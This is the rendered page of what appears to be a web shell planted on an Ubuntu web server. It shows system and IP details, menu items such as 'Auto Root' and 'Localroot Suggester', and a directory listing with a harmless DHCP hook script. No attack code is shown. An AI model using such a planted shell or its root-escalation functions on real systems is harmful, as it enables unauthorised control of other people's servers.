Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.217.105
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
dhcp /
dhclient-enter-hooks.d /
Delete
Unzip
Name
Size
Permission
Date
Action
debug
1.39
KB
-rw-r--r--
2022-05-05 17:18
resolved-enter
421
B
-rwxr-xr-x
2022-07-19 16:56
samba
1.87
KB
-rwxr-xr-x
2024-01-06 06:23
Save
Rename
#!/bin/sh ## Sourced, not exec'ed, but helps syntax highlighting # # Script fragment disabling make_resolv_conf(), # to be used in conjunction with dhclient-exit-hooks.d/resolved # if systemctl is-enabled systemd-resolved > /dev/null 2>&1; then # Undefine the nasty default make_resolv_conf() to avoid it overriding # /etc/resolv.conf (or /run/systemd/resolve/stub-resolv.conf) make_resolv_conf() { : ; } fi